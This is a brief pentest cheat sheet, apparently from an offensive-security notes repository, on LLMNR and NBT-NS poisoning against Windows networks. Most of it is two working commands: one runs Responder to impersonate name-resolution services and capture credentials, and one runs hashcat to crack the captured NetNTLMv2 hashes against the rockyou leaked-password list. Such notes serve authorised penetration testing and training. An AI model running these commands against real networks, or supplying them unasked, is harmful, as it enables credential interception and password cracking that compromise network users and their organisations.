killchain-compendium/Exploits/Windows/LLMNR.md

Link Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS)

• LLMNR, name resolutions inside the local domain for other hosts

• NBT-NS, identifying hosts in the network by NetBIOS names

• Impersonating the actual service to get credentials

Usage

• From responder

sudo responder -I <NIC> -rdw -v 

• Dictionary attack on catched password

hashcat -m 5600 hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r rules/OneRuleToRuleThemAll.rule --debug-mode=1 --debug-file=matched.rule